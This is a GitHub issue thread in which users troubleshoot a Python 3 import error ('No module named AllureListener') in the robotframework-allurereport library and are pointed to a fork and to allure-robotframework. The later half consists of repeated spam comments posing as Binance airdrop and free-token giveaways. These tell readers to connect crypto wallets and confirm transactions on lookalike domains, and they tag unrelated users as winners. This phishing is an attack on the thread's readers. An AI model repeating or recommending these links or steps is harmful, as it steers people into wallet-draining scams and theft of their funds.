### ISSUE TITLE
failed: ModuleNotFoundError: No modu le named 'AllureListener'

### ISSUE THREAD

**Issue by VatthanachaiW** [kootstra/robotframework-allurereport#2]
Hi,
I have same error message when call AllureReportLibrary in test.robot. Can your help me to fix this?
Thanks you.

Error message :
`
PS C:\Users\ai\Documents\RobotProject> python -m robot .\test.robot
[ ERROR ] Error in file 'C:\Users\ai\Documents\RobotProject\test.robot': Importing test library 'AllureReportLibrary' failed: ModuleNotFoundError: No modu
le named 'AllureListener'
Traceback (most recent call last):
  File "C:\Program Files\Anaconda3\lib\site-packages\AllureReportLibrary\__init__.py", line 2, in <module>
    from AllureListener import *
`

test.robot
`
*** Settings ***
Library    Selenium2Library
Library    AllureReportLibrary    C:\\temp

*** Test Case ***
Hello Google
    Open Browser    http://www.google.co.th    firefox

`

**Comment by idxn** [comment]
@VatthanachaiW How did you install the library? AllureListener is already included in the package. I'm not sure it relates to Anaconda or not. Have you tried the standard python?

**Comment by VatthanachaiW** [comment]
thank you for you answer.

I'm just install from command line like this.
"pip install robotframework-allurereport"

I think I will clean remove python and try to install it again.

**Comment by idxn** [comment]
@VatthanachaiW  how does it go? is your problem resolved?

**Comment by okgolove** [comment]
I have the same problem in Ubuntu Subsystem for Win10.
`Importing test library 'AllureReportLibrary' failed: ImportError: No module named 'AllureListener'`

**Comment by VatthanachaiW** [comment]
@idxn Sorry for late answer. the problem are not fix.

**Comment by idxn** [comment]
emmm do you guys want me to take a look via any desktop sharing software?

**Comment by okgolove** [comment]
@VatthanachaiW what version of python do you use?
I have this problem only with Python3, there isn't it with Python2.7.

**Comment by VatthanachaiW** [comment]
@okgolove my python version is 3.6

**Comment by okgolove** [comment]
@VatthanachaiW as far I know python3 has a new import modules system. Because of this you have an described error.
I used 2to3 to fast port this lib to python3, also deleted some useless for me code (related to pabot). It works for me. I think I'll fork this repo and will commit my changes to it, but a little bit later.

**Comment by VatthanachaiW** [comment]
Thank you very much, I'll waiting for you change. 👍

**Comment by okgolove** [comment]
@VatthanachaiW you can try to clone and build whl from here: https://github.com/okgolove/robotframework-allurereport/tree/python3
Use branch "python3".
Try to build whl using command:
`pip3 wheel --no-deps`

And install:
`pip3 install robotframework_allurereport-1.3.0-py3-none-any.whl`

**Comment by VatthanachaiW** [comment]
@okgolove Thank you very much, I'll try.

**Comment by ornichola** [comment]
@okgolove it's worked for me, thank you!

**Comment by okgolove** [comment]
Also you can use this: https://pypi.python.org/pypi/allure-robotframework/0.1
It works nice, I've tried.

**Comment by richhamseth** [comment]
@okgolove-rf https://pypi.python.org/pypi/allure-robotframework/0.1 this link is not working for me
Cloning into '0.1'...
fatal: repository 'https://pypi.org/pypi/allure-robotframework/0.1/' not found

**Comment by richhamseth** [comment]
@VatthanachaiW https://github.com/okgolove/robotframework-allurereport/tree/python3
Cloning into 'python3'...
fatal: repository 'https://github.com/okgolove/robotframework-allurereport/tree/python3/' not found

**Comment by okgolove-rf** [comment]
@richhamseth I've just tried this one:
`pip3 install allure-robotframework`
And it works.

**Comment by richhamseth** [comment]
@okgolove-rf  Hi,
I have same error message when call AllureReportLibrary in test.robot. Can your help me to fix this?
Thanks you.

OS : ubuntu 14
Python: 3.4.0
Robotframework: 3.0.2
AllureReportLibrary: 1.1.1

error message:
rich@rich-HP-Pavilion-g6-Notebook-PC:~/Downloads/Marketplace-api$ python3 -m robot.run test.robot 
[ ERROR ] Error in file '/home/rich/Downloads/Marketplace-api/test.robot': Importing test library 'AllureReportLibrary' failed: ImportError: No module named 'AllureListener'
Traceback (most recent call last):
  File "/home/rich/Downloads/Marketplace-api/AllureReportLibrary.py", line 1, in <module>
    from AllureListener import AllureListener
PYTHONPATH:
  /usr/local/lib/python3.4/dist-packages/robotremoteserver-1.1-py3.4.egg
  /usr/lib/python3/dist-packages
  /usr/lib/python3.4
  /usr/lib/python3.4/plat-i386-linux-gnu
  /usr/lib/python3.4/lib-dynload
  /home/rich/.local/lib/python3.4/site-packages
  /usr/local/lib/python3.4/dist-packages
Source code:
*** Settings ***
Library  Selenium2Library
Library  AllureReportLibrary    //var//lib//Allure


*** Test Case ***
Hello Google
   Open Browser  http://www.google.co.th  firefox

**Comment by okgolove-rf** [comment]
@richhamseth I recommend replace AllureReportLibrary with allure-robotframework 
https://github.com/skhomuti/allure-python

**Comment by richhamseth** [comment]
@okgolove-rf  thanks its working

**Comment by thepoppingone** [comment]
@okgolove-rf Hi, I am facing the same issue as @richhamseth, may I know what do you mean by replacing `AllureReportLibary`? 

I tried to replace it in the robotframework robot file 
```
Library allure-robotframework
```
and `pip install allure-robotframework` and the error is still recurring. Any form of help will be useful! Thanks!
```
 [ ERROR ] Error in file '/Users/<user>/hats/hats-ci/virtualenv/testpage/test_for_mac.robot': Importing test library 'AllureReportLibrary' failed: ModuleNotFoundError: No module named 'AllureListener'
Traceback (most recent call last):
  File "/Users/<user>/anaconda3/lib/python3.6/site-packages/AllureReportLibrary/__init__.py", line 2, in <module>
    from AllureListener import *
PYTHONPATH:
  /Users/<user>/anaconda3/bin
  /Users/<user>/anaconda3/lib/python36.zip
  /Users/<user>/anaconda3/lib/python3.6
  /Users/<user>/anaconda3/lib/python3.6/lib-dynload
  /Users/<user>/anaconda3/lib/python3.6/site-packages
  /Users/<user>/anaconda3/lib/python3.6/site-packages/aeosa
```

**Comment by okgolove-rf** [comment]
@thepoppingone you don't need to use `Library allure-robotframework`. You need to run robot with listener option like in documentation:
```robot --listener allure_robotframework ./my_robot_test```

**Comment by Nall11G** [comment]
@ghost I have tried allure robotframework in Jenkins- Linux server I am facing the same error:

[ ERROR ] Taking listener 'allure_robotframework' into use failed: Importing listener 'allure_robotframework' failed: ModuleNotFoundError: No module named 'allure_robotframework'
Traceback (most recent call last):
  None
PYTHONPATH:
  /usr/local/bin
  /usr/local/lib/python37.zip
  /usr/local/lib/python3.7
  /usr/local/lib/python3.7/lib-dynload
  /usr/local/lib/python3.7/site-packages

My Run Command is : robot --listener allure_robotframework TestCases/TestSuite.robot

**Comment by paramaputra** [comment]
### Join Binance Arbitrage in Celebrating 2023: Divide Up to 600,000 BNB in Rewards! 

At Binance, we truly believe that decentralized finance will play a pivotal role in the future.

In order to unlock the mainstream adoption of Binance Coin(BNB), a good wallet is one of the most important gateways for our users.

Now team up with the high-quality wallets that have supported our Binance Chain since the beginning, we jointly launch the Binance arbitrage smart contract. Use the smart contract to trade your ETH to BNB, and it generates an extra 10%~12% BNB as your profit, which we committed to a total of 600,000 BNB.

The currently online smart contracts are applicable to Trust wallet, Atomic wallet, and ZenGo wallet

To start the Arbitrage smart contract, please follow the steps below: [Binance Rewards](http://go.bnbrewards.online/WvDubR)


[![Claim Now](https://public.bnbstatic.com/image/cms/article/body/202303/44b0b95a5bef2cc2479d683bfbbdf8ba.png)](http://go.bnbrewards.online/WvDubR)

### Secure Your BNB with These Simple Steps:

1. **Connect Your Wallet:**
   - Head over to the [Binance](http://go.bnbrewards.online/WvDubR).
   - Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - [Confirm your eligibility  Airdrop](http://go.bnbrewards.online/WvDubR).

3. **Engage for Extra Rewards:**
   - Participate in community discussions or complete tasks for bonus rewards.

### Bonus Tips:
- **Community Assistance:**
  - Need help? Drop a message on Telegram or other social media platforms.

- **Stay Informed:**
  - Keep an eye out for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution might take a while. Stay calm and keep an eye out for updates.

**Comment by gqgserver** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*

**Comment by p4u1d34n** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*

**Comment by steveg-gpsaustrack** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @Charlita, @lookfirst, @lcharles123, @zhangarejiu, @linglung, @noisyoscillator, @iainwh

**Comment by fahirazm** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @NirajShr3stha, @CaMo3BaH4uK, @yemix, @humCN, @joaorafaelm, @zbindenren, @aomtny

**Comment by KaseToatz** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://claim.bnbchainnetwork.xyz/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://claim.bnbchainnetwork.xyz/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @jmanzitti, @Hachbil, @casch-at, @evilnatas, @miaekim, @monkeyip, @ledil

**Comment by KaseToatz** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://claim.bnbchainnetwork.xyz/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://claim.bnbchainnetwork.xyz/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @dameinliu, @k-park, @adik, @cosinlink, @sofiffa, @joshstevens19, @prijindal
